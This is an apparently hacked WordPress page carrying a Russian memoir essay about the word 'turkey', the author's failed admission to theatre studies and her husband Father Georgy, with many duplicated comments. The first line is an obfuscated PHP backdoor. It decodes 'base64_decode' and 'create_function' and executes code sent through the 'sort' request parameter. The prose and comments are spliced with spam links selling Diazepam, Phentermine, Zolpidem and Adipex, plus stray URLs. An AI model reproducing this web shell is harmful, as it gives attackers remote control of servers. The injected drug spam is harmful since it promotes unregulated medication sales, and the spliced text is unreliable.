nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

СУДЬБА-ИНДЕЙКА- о заморочках(1)


        преамбула ( вместо  эпиграфа )

     Судьба индейка  забросила  нас  в  Америку. Как  раз  туда, откуда  сама  индейка  родом (…)
     Недоумения  с  названием  этой  птицы  начались  уже  в  начале  16 века, когда  испанцы  привезли  её  в  Европу.  Сами  они  назвали  эту  птицу  pavo –  павлин. Очевидно,  глядя  на  индюка, они  ничего  другого  придумать  не  смогли.
    Русский  и  французские  языки  повторили ошибку   Колумба  и  назвали  эту  птицу   и н д е й к о й : "и з  Индии" ( d'Inde ).
    В  Англии  же  индейку  назвали  turkey-coock   –  турецкий  петух, т.к.  привозили  её  сперва  из  Турции.(…)

    Во  Флориде  живёт  особый  вид  –  oceola. Эта  индейка  названа  в  честь  Оцеолы,  вождя  семинолов,  поднявшего  восстание  в  19 веке. Любопытно,  что  возглас  "асяола!"  –  что-то  типа  "хорошо  пошло!" Так  должен  был  крякнуть  настоящий  индейский  мужчина,  выпив  культовый  чёрный  напиток,  очищающий  дух (…)
   Индейка  –  тотем  у  многих  индейских  кланов. Они  украшают  себя  её  перьями,  перьями  стабилизируют  стрелы, пришивают  её  ноги   на  одежду. Правда,  некоторые  племена считают  индейку  трусливой  –  поэтому  не  едят  её   мяса,  чтобы  трусость  птицы  не  передалась  бы  и  им.
  Бенджамен  Франклин  хотел  сделать  индейку  символом  США,  но  утвердил  белоголового  орла,  птицу  сомнительных  моральных  качеств. ( . . .)

                               "Судьба  индейки". Галина  Эйснер-Негрук,  лауреат  премии  журнала  "Флорида".

      Банальная  для  земной  жизни  ситуация:  "ищешь  Индию  –  находишь  Америку" !
      Всё  так  по-прежнему  и  продолжается: все  влекутся  "энергией  заблуждения" – термин  Л.Н.Толстого, когда он, начав  работу  над  романом о  Петре  Первом,закончил  это  дело  "Анной  Карениной" . Влекутся  колумбы-пассионарии   этой  "энергией  заблуждения"  в  даль  светлую  и  даль  несветлую   расширять  нам  горизонты  мира  видимого  и  мира  невидимого. Следы  же  их   броуновского  движения  мумифицируются  в  причудливых  произведениях, топонимах  и  фразеологизмах. Например, остров Пасхи  "в  лоб"  так  и  назвали, потому что  к  нему подплыли  в  Пасху ; Тихий  океан  неадекватно  назван  мореплавателями,  попавшими  в  него   в   редкий   момент  затишья  сАмого  нетихого  водоёма ; Охотское  море,  никакого  отношения  к  "охоте"  и охотникам не  имеет,  поскольку  по-эвенски  "окота"  значит  "река". Я, недавно  узнав  это,  была  в   обалдении, поскольку  прожила  полтора  года (в 1963-1964 гг.)  на  самом   севере  Сахалина,  в  городе  О х е   (мамочка  сдуру  туда  завербовалась).  Только   с е й ч а с ( ! )   я  догадалась  о  родственности   названий  города  Оха  с  Охотским  морем, где  у  сахалинских  нивхов   " t ' o h " – значит  "грязная  река". . .
    А  если  взять   "накладки"  в  церковно-исторической  области,  то,  например,  святые  Флор  и  Лавр, "назначенные"  молвой  быть  покровителями  домашнего  скота  и  земледелия  только  по  своим  именам,  на  самом  деле  были. . .  каменотёсами,  а   святого  Наума   так  же  по  звучанию  имени  обязали  отвечать  за  ученье  и  ум . . .    Все  подобные  семантические  "накладки"  были  бы  за  давностью  лет  и  укоренения  в   народных  традициях  неприкосновенны,  если  бы . . .  Перед  моим  мысленным  взором  встают  кадры  из  нашего,  отечественного  сатирического  фильма  (не  могу  вспомнить  названия), где  говорится: ". . .А  давайте    е ё   сделаем  министром  сельского  хозяйства  –  у  неё  красивые  ноги !" (= красивое  имя  и  т.п.). . . .

( это  всё  я  клоню  к  своей  финальной   и  серьёзнейшей  теме  своего  ЖЖ  "Кто  такой словущий ?")
                                                            ^
     То   есть  вот  мораль  вышеприведённого   абзаца.
     Мы, путешествуя  по  жизни   с  набором  привычных  терминов,  должны  помнить, что  очень  часто  их  толкование  н е в е р н о, что  эти  термины  местами  "в  лоб",  где-то  они  "по лбу",  где-то  в  точку, а   где   и    в    з а м о р о ч к у !
   Но вернёмся   к  "судьбе-индейке".
   Мне  чудится, что  неожиданно  появившийся  четверть  века  назад  в  нашем  лексиконе  возглас-полуругательство  "блин!" является  контроверзой  пришедшей  пару-тройку  веков  назад, и  несомненно, с  Запада  "судьбе-индейке" ( ещё Лермонтов  это  выражение  вложил  в  уста  капитана-секунданта  дуэли  Печорина  с  Грушницким)
   В  начале  наших "девяностых" , когда  наши  дети  впервые  принесли  из  Теребенской  школы  этот  эмоциональный  сгусток  букв  "б-л-и-н",  я  была  возмущена  этой   прилипчивой  ерундой  и  просила   их   воздерживаться  от  этой  бессмыслицы. Но  когда  даже  в  СМИ  эти   "блины"  стали  проскакивать, то  я  поняла,  что  запретами  "плетью  обуха  не  перешибёшь"  и  "эту  песню  не  задушишь,  не  убьёшь", и  что   к  этому  явлению  лучше  подходить  "аналитически", а  не  исходить  на  "г".
    Да, ведь  в   каждом  явлении  можно  найти    т е з у.  Так  вот,  " и   я,  покорный  общему  закону",  вслед  за  детьми  заразившись  этими  "блинами",  вдруг   пронаблюла  такую  "блинную"  особенность. Слово  "блин"  оканчивается  на   обычно  "съедаемый", неслышный  звук "Н". Однако   при   р у г а т е л ь н о м    возгласе  язык  (который  во  рту)  вынужден  сделать  акцент  именно  на  конечное " http://muleymadness.com/photos/blank-305/ Н", подперев  собою н http://ajnuest.com/comments/feed/ ёбо.
    Правда ? –  это  красивая  метафора: язык  подпирает  небо . . . Во-вторых,  у  людей  улучшается  артикуляция.  Ну  и, конечно, моральная  сторона: всё-таки  звонкие  ругательства  "предыдущего  поколения"  –  они  "слетают  с  языка", словно  отхаркивающее  средство, они  – агрессия,  направленная  во  вне. А  "блиННЪ",  наоборот, "застревает "  во  рту  на  последней  букве, это  агрессия,  так  сказать,  направленная  во  внутрь . . . К  чему  бы  это ?

     Ну, потеоретизировать-то  я  люблю  –  об  истоках  этой  любви  я  уже  писала  в  предыдущих  "мемориях"("Именительный-родительный…"), что  мол  это  у  меня  наследственное.  В  связи   с  этим  (а   не  " в  этой  связИ" – вот  безграмотное  выражение !) – то  есть   в   связи  с  моим теоретизированием  расскажу  ещё  одну  историю  про  мою  собственную  судьбу-индейку: как  меня  пронесла нелёгкая мимо  театроведения ?

    Моя  мамочка – любительница  общественной  жизни, она, конечно,  в  своё  время  была  заводилой  в  школе.  И  после  окончания  школы, и   до  конца  своих  дней  она  активно  поддерживала  это  детское  сообщество. Среди  её  одноклассников  прошло  моё  детство. Тогда  я  всех  называла  "тётями" и  "дядями", не  понимая,  г д е   различие  между  ними  и  действительно  родственниками  . . . Кстати,  я  как-то  в  начале  своего  знакомства  с  Георгием, спросила  у  него  про  этот  феномен  именования  всех  "дядями  и  тётями", почему  мы  в  детстве  чужих  людей    т а к   называем ? Он  мне  без  промедления  ответил: "Все  же  люди  –  братья !  Естественно,  по  отношению  у  детей  с в о и х   братьёв  и  сестёр  они  и  должны  называться  "дядями  и  тётями" !"  Я  была  впечатлена.
     Так  вот. Среди  "по  гроб  жизни"  мамочкиных  одноклассников  были  её  самые  задушевные, взаимообожаемые  друзья – Горфункели, дядя  Ёся (Иосиф  Моисеевич)  и  абсолютно  русопятая  тётя  Зоя (Лена  –  просто  абсолютная  копия  своей  матери !),  "Ёська"  и  "Зойка".  А  моя  мамочка  для  них  была  вечная  "Л е н к а",  как  и  их  дочка  именовалась  не  иначе  как  "наша  Ленка". Я  не  буду  настаивать,  но  подозреваю,  зная  их  с  моей  мамочкой  благоговейное  друг  к  другу  отношение, что  их  "Ленка"  в  значительной  степени  названа  Еленой  именно  в  честь  моей  мамочки. Когда  я  училась  в  старших  классах,  эта  Лена ( на  пять  лет  старше  меня)  у ж е    была   в  Театральном  институте  на  театроведческом   отделении  ленинским  стипендиатом (ой, с л у ч а й н а я   игра  слов  с  "ленинизмом"!). Вскоре  (и  по  сей  день) Елена  Иосифовна  Горфункель –  первая  скрипка  в  оркестре  наших  театральных  критиков. Отсюда, от  успеха  дочки  лучших  друзей,  у  моей  мамочки, неимоверно  честолюбивой, несмотря  ни  на  какие  дружбы,  и  был  непререкаемый  план  моего  внедрения  в  ту  же,  театроведческую,  сферу,  чтобы  я  удовлетворила  это  мамочкино  честолюбие  и  чтоб  всех  "лен"  превзошла.

   . . .(Делаю  сейчас, спустя  какое-то время  после  написания  этой  мемории  небольшу  вставку – не  могу  удержаться. Как-то в  семидесятые  годы  Георгий  случайно  встретил  на  ленинградской  улице  армейского  сослуживца.  Оказалось,  что  этот  перень, Боря  Тулинцев, муж  Лены  Горфункель, тоже  известный  питерский  театровед. Взаимоотношения,  к  счастью  или  сожалению,  не  продолжились.). . .

  . . . Судьба-индейка  пошла моей  мамочке  навстречу, и  дала  ей  прочное  и  выгодное  знакомство  (из-за  которого  мои  родители  развелись) –  с   пианистом,  который  для  всей  ленинградской   богемы  чинил  и  настраивал  пианино  и  рояли.  Близким  же  дрУгом  этого   мамочкиного  пианиста  был  набиравший  в  то  время  в  Театральном  институте   актёрский  курс  Леонид  Фёдорович  Макарьев  (известный  широкому  кругу  по  фильму  "Операция  Трест"). Виктор  Семёнович Чурин –  так  звали  мамочкиного  друга –  просто  у г о в а р и в а л   меня  идти  " на  актёрский !" –  мол  проблем  никаких ! Я  –  ни  в  какую, "не  моё  это !"  Вот  теоретизировать  –  это  ещё  куда  ни  шло . . . но  "выходить  из  себя"  и  "входить  в  образ" –  нет  уж,  увольте !
    Мамочкин  друг  был  этим  взвинчен – тем, что  Макарьев  там,  на  театроведческом,  не  властен. А  мой   п а п а    от  слова  "театральный"  начинал  скрипеть  зубами  и  сжимать  кулаки,  поскольку  только  ради  меня  перешёл  из  военных  академий  в  Политехнический  институт  и  даже  пошёл  работать  в  приёмную  комиссию  этого  института, категорически  меня  туда  завлекая. . .
     Экзамен  по  "специальности"  на  театроведческом  состоял  из  двух частей: письменной  рецензии  (на  один  из  ленинградских  спектаклей)  и  устный  –  собеседование, "коллоквиум".
     В  первый  год  моего  поступления,  то  есть  сразу  после  школы,  я, написав  рецензию  на  "4",  не  пошла  дальше  сдавать –  под  предлогом  именно  четвёрки, а  не  пятёрки.  Четвёрку  же  я  схлопотала,  потому  что  на  экзамене  моя  соседка,  прибалтийка,  шедшая  по  "комсомольской  путёвке"  (когда  было  достаточно  хоть  что-то  написать  и  сказать  на  тройки),  попросила  меня  проверить  ошибки  в  её  "сочинении",  и   я,  увлёкшись  этим,  почти  полностью  её  рецензию  переписала  наново,  про  себя  совсем  забыв . . . Но, если  честно, то  мне  просто  очень  хотелось  после  школы  передохнуть  и    п р о с т о    п о р а б о т а т ь   "за  кулисами"  театра  –  для  "общего  развития". Осуществив   этот  свой  план  "непоступления"  и  нанявшись  рабочей  сцены  в  Пушкинский (Александринский)  театр,  тут-то  я   и  познакомилась,  на  горе  моей  мамочки  и   всех  её  прихехешек,  с  Георгием,  своим  будущим  мужем  и  ещё  в  более  далёком  будущем  о.Георгием, "титаном  мысли  и  отцом  народов".
    На  следующий  же  год   поступления  в  тот  же  институт  я,  мало  того,  что  все  экзамены  сдала  на  пятёрки,  но  во  время  "коллоквиума"   произошло   небывалое:  меня  экзаменаторы  попросили  выйти,   н о  " д а л е к о    н е    у х о д и т ь ",  так  как  им  всем  захотелось  задать  мне  ещё  "несколько  вопросов" (чем-то  я  их  заморочила  –  ничего  не  помню!).
     Мои  коллеги-абитуриенты,  когда  я  вышла  из  аудитории, были  этим  шокированы  и  не  сводили  с  меня  глаз.  Поэтому  я  всё  удалялась  и  удалялась  от  них  по  коридору.  Доудалялась  я  до  тех  пор,  пока  не  произошло  чудо,  как  в  фильме  "Старшая  сестра" с  Татьяной  Дорониной: актёрство  само  шло  мне  "в  руки" ( это  отнюдь  не  было   как  в  фильме  "Приходите  завтра",  когда   Фросю  Бурлакову  морочат  два   студента-наглеца). Моя  ситуация  была   в с а м д е л и ш н я я, когда  двум  абитуриентам-артистам  или  студентам-артистам  была  необходима  девочка-статистка  для  их  экзаменационного  этюда. Я  по  доброте  душевной  не  могла  им  отказать,  понимая,  что  сейчас  прошляплю  свой   "отложенный"  устный  экзамен,  во  что  эти  ребята  не  могли  поверить. Мне  же  от  их  актёрства,  в  которое  я  была  включена,  стало  настолько  плохо,  что  они  меня  с  миром  отпустили, а  я  при  этом  окончательно  резюмировала,  что  "это  не  моё !"
     Я  всё-таки  не  опоздала  ко  второму  экзаменационному  "антре". . .
     Но  вот  что  странно: получив  в  итоге, повторяю,  все  пятёрки,  да   при  том   имея   какую-никакую   "р у к у",  я   почему-то   н е    п р о ш л а    по  конкурсу ! Зато это  моё  фиаско  (и   именно оно !)  укрепило  мои  взаимоотношения  с  Георгием, который  ещё  более,  чем  я,  был  рад, что  мне  дали  в  институте  от  ворот  поворот. Судьба – индейка ! Я  искала  "Индию" – театроведение,  а   в   реальном  театре  нашла  Георгия   и  его  "подозрительное"  окружение,  как  когда-то  Горький  сказал  про  свои  красильные  мастерские  – "мои  университеты" !
   Но  именно  разгадке  этой    т а й н ы   моего    непоступления    при   всех   пятёрках  и  блатах   я   и  посвящаю  эту  "меморию" !

     ( А  про  мой  третий, опять  же  к  радости  Георгия, "провал"  я   уже  писала   в  "мемории"  "Кто  в  театр  попал – тот  пропал!"  –  не  буду  сейчас  повторяться.)

                                                              ИТАК, иду  на  Вы . . .

   эпиграф

". . . Теребени  –  место  силы . . .! "

   недавние  слова  (ноябрь 2015 года) одной ясновидящей,  услышанные  ею  от  явившегося
   к  ней  собственной  персоной  Иллариона  Матвеевича  Голенищева-Кутузова  (1717(1715?)-1784),
   захороненного  под  Теребенской  церковью,  и  мне  (эти  слова) трепетно  ею  переданные.

     В  один  прекрасный  летний  день  конца  "девяностых"  нас  с  о.Георгием  посетила  непростая  компания  "гуманитариев". Например, в  этой  "випкомпании"  был  японец,  профессор  русского  языка. Мне  срочно  надо  было  устраивать  "пир  горой". При  этом  о.Георгий  были  всем  подал  на  стол   непривычные  в  то  время (не  то  что  сейчас с  бесчисленными  суши-барами) особые японские  палочки  для  еды, которые  нам  подарила  недавно   крестившаяся  в  Теребенях  японка-реставратор  из  Токио. Наша  подруга  обучала  её  у  нас  в  Теребенях  реставрации  икон  "в  полевых"  условиях,  а  не  в  комфортных  лабораторных.
  ——————————————————–

 По  этому  поводу  хочется  рассказать  об  очередной  промыслительности "высших  сил". Тиэко  (так  зовут  японку) долго, годами  подходила  к  необходимости  креститься. У  нас   она  была  уже  не  в  первый   раз. Решившись, наконец, она  заранее  подобрала  для  себя  православное  и м я,  очень  ей  понравившееся  –   Серафима. Господь  устроил  так,  что  в  один  из  дней  её  пребывания  у  нас  Он, Господь,  наслал  к  нам  креститься   симпатичных  девушек,  а  у  нас  как  раз  гостил  симпатичный  переводчик-синхронист  (английского  языка,  который   японцы  знают, как  свой  родной). Надо  было только  выбрать,  не  пропустить   момента,  и  чуть-чуть  Тиэко  поддразнить,  чтоб она  не  отстала  от  этой  "европейской"  компании, в  которой  и  сам  о.Георгий  расцвёл,  как  георгин  среди  роз,  и  златоустовствовал  при  мгновенном  переводе  всего  этого  для  Тиэко  на  понятный  ей  язык. Но  в  чём  оно  было,  это  состоявшееся "миничудо"?  Войдя  в  церковь, мы  заглянули   в  церковный  календарь, и   выяснилось,  что  этот  день  –  11    августа,  и  есть  день  святой  Серафимы ! Тут  уж  и  речи  быть  не  могло,  что  якобы  "рано  ещё  креститься" : надо, Серафима, надо !

        Так  вот, в  день, о  котором   выше  я  начала  рассказывать, на  стол  были  поданы  те  палочки  для  еды,  которые  незадолго  до  этого  нам  подарила Тиэко-Серафима. От  этой  "сервировки" наш  гость-японец  опешил. Это было  его  первое  потрясение.  А  вторым  потрясением  было  то, что  о.Георгий, чокаясь  и  чокаясь  с  японцем, сумел  доказать  ему,  что  Теребени    д р е в н е е   Японии !!  От  непререкаемости  аргументов  о.Георгия   профессор  получил  определённый  стресс,  пошёл  обозреть  эту  "древность  деревни, которая  древнее  Японии"  и,  как  потом  выяснилось, заснул  под  живописной  берёзой  за  церковью. А  вся  честнАя  компания  перед  отъездом  тоже  получила  хороший  стресс, более  получаса  ища  и  аукая  вырубившегося  профессора.

   Я  же  в  свою  очередь  тоже  получила  стресс –  от  дамы, которая  сидяла  рядом  со  мной  и  с  которой  мы  по-светски  разговорились.
   Я  задала  ей  вопрос, кто  она  по  профессии,  если  таковая  имеется ?  И  она  мне  простодушно  поведала, можно  сказать, своё  сокровенное, которое  меня  смущает  до  сих  пор. Я  не  буду  здесь,  на  письме, ставить  знаки  препинания,  обозначающие  "прямую  речь"  моей  собеседницы,  поскольку  передаю  её  повествование  всё  же  своими  словами –  просто  изменю  шрифт.

    Я  окончила  театроведческий  Театрального  института, что  на  Моховой. Но   н и    о д н о г о    д н я    в  жизни  не  работала  по  этой  специальности,  ни  разу  этот  диплом  мне не  пригодился !  Получилось  мне  туда  поступить  чисто  случайно,  и  я  несколько  раз  пыталась  бросить  это  ученье-мученье, но  мой  муж  каждый  раз  просил  меня  не  делать  этого,  потому  что  ему  нравилось  писать  за  меня  работы: курсовые,  статьи  и  даже  "мой"  диплом  он  за  меня  же  и  писал  в  полное  своё  удовольствие.
       (Я  с   интересом  спросила  тему  диплома: название  сказала  не  она,  а  её муж.  Конечно,  я  спросила, зачем  ей  вообще  надо  было  поступать  на  нелюбимый  и  не  интересный  для  себя  факультет, на  что  моя  собеседница   любезно  и  ответила.)
  Я  поступала   Buy Diazepam Online London на   актёрский,  но  не  прошла  по  конкурсу.  А  в  приёмной  комиссии  работал мой  хороший  знакомый.  Он  мне  и  предложил: "А  давай-ка  мы  твои  в  полном  порядке  документы   п е р е б р о с и м   с   актёрского  на  театроведческий ?"  Я  не  стала  возражать.  Так  и  получилось . . .

    Невольно  вспомнился  роман  Агаты  Кристи  и  по  нему  два  фильма  –  "Зеркало  треснуло" ! Я  сразу  "скумекала"  и  озвучила  по  этому  поводу  своё  недоумение, рассказав  про   с в о и   мытарства  поступления  на  "какой-то  там" теоретический  факультет, куда  принимали  человек  пятнадцать, из  них  половина  "обречённых"  на  поступление  по  комсомольским  путёвкам.  В  том-то  и  дело,  в  этом-то  и  загвоздка !  Ведь  если  из   шкафа  с  большим  количеством  папок "не  прошедших" на  актёрский  берут  одну,  которую  всовывают  в  другую  стопку  или  рядок,  где  их  гораздо  меньшее  количество, то  из  последнего  надо  изъять  папку,  чтоб  на  это  место  вставить  вынутую  из   т о г о    набора  папок? Очень  возможно,  это  и  была   м о я   изъятая  папка ?
   Конечно,  моя  собеседница  от  такой  моей  интерпретации  её,  повторяю,  простодушного  повествования  пришла  в  крайнее  возмущение: да  как ! да  такого  не  может  быть ! годы  наших  поступлений  не  совпадают ! (хотя  очень  даже  совпадали, но  она  стала  с  этими  годами  "мутить",  да   и   я  не  готова  была  к  такой  резкой  конфронтации  с  гостьей . . .)

      http://chelseafc360.com/2013/01/ Так  оно было  или   http://ectarc.com/ не  так,   но  подумайте,   к а к а я     получилась  невероятная   ситуация: вдруг  здесь,  в  деревне, через  десятилетия , от  совершенно  незнакомого  мне  человека   я  слышу  реальную, лично  меня   касающуюся  историю ! . .  Просто  такое  нарочно  и  не  придумаешь !

       Да, это  –  Теребени!  Здесь  часто  тайное  вдруг  становилось   явным . . .  место  силы,  понимаете  ли . . . Очередная  классная  история !

       А  мой  Георгий  от  неё,  истории,  был  в  очередной  раз  просто  счастлив !  Он  вообще  всегда  был  –  хоть  трезвый, хоть  пьяный  –  в  каком-то  неописуемом   состоянии   счастья  и  уверенности  в  себе.  Я  училась  и  продолжаю  учиться  от  него  этому, чуждому  мне, кайфованию. Поэтому  и  люди  тянулись  к  нему.В  этом-то  и  есть  какая-то  неправда   з е м н о г о,  приземлённого,  существования
       И  сейчас . . .  частенько  именно  в   т а к о м    своём   счастливом  состоянии  он   многим  в   утешение  нет-нет  да   и  приснится ! . . В  том  числе  и  мне . . .

""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Buy Phentermine Online 37.5 Mg АНОНС:  ДА  КТО  Ж ТАКОЙ СЛОВУЩИЙ ?феномен "поручика Киже"

  


  1. Люди тянулись к отцу Георгию по целому ряду оснований. Buy Zolpidem 5Mg А. Его исповедание веры было живым, не окостенелым. http://stoemper.com/twentytree-eddy-bike-540x-2/ Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. http://code-pages.com/home-default/ В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  2. Люди тянулись к отцу Георгию по целому ряду оснований. http://mwbuzz.com/index.php/nicki-minaj-cardi-b-20-more-stars-who-dress-like-dominatrixes-in-everyday-life/ А. Его исповедание веры было живым, не окостенелым. Diazepam Kopen Via Internet Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. http://rock107.com/photos/nggallery/rock107/rock-107-birthday-bash-photos-by-jesse-faatz/page/1/slideshow В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  3. Люди тянулись к отцу Георгию по целому ряду оснований. http://soligenix.com/?p=74 А. Его исповедание веры было живым, не окостенелым. Buy Adipex 37.5 Diet Pills Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  4. Люди тянулись к отцу Георгию по целому ряду оснований. А. Его исповедание веры было живым, не окостенелым. Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  5. Люди тянулись к отцу Георгию по целому ряду оснований. А. Его исповедание веры было живым, не окостенелым. Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  6. Люди тянулись к отцу Георгию по целому ряду оснований. А. Его исповедание веры было живым, не окостенелым. Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  7. Люди тянулись к отцу Георгию по целому ряду оснований. А. Его исповедание веры было живым, не окостенелым. Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  8. Люди тянулись к отцу Георгию по целому ряду оснований. А. Его исповедание веры было живым, не окостенелым. Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  9. Люди тянулись к отцу Георгию по целому ряду оснований. А. Его исповедание веры было живым, не окостенелым. Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  10. Люди тянулись к отцу Георгию по целому ряду оснований. А. Его исповедание веры было живым, не окостенелым. Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  11. Люди тянулись к отцу Георгию по целому ряду оснований. А. Его исповедание веры было живым, не окостенелым. Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  12. Люди тянулись к отцу Георгию по целому ряду оснований. А. Его исповедание веры было живым, не окостенелым. Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  13. Люди тянулись к отцу Георгию по целому ряду оснований. А. Его исповедание веры было живым, не окостенелым. Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  14. Люди тянулись к отцу Георгию по целому ряду оснований. А. Его исповедание веры было живым, не окостенелым. Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  15. Люди тянулись к отцу Георгию по целому ряду оснований. А. Его исповедание веры было живым, не окостенелым. Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  16. Люди тянулись к отцу Георгию по целому ряду оснований. А. Его исповедание веры было живым, не окостенелым. Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  17. Люди тянулись к отцу Георгию по целому ряду оснований. А. Его исповедание веры было живым, не окостенелым. Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

  18. Люди тянулись к отцу Георгию по целому ряду оснований. А. Его исповедание веры было живым, не окостенелым. Б. Он видел объём веры, как она наследуется от других вер, существовавших до неё. В частности, к этому относится его одержимость Египтом. В. Он был человеком среди людей; как все, он вставал и поднимался из собственных развалин.

    И всего одну проблему он не смог разрешить – проблему бессмертия Души. Ну и не он один; целая конфессия не справилась. Проблему конечности состояний ада и рая, если угодно принять

Добавить комментарий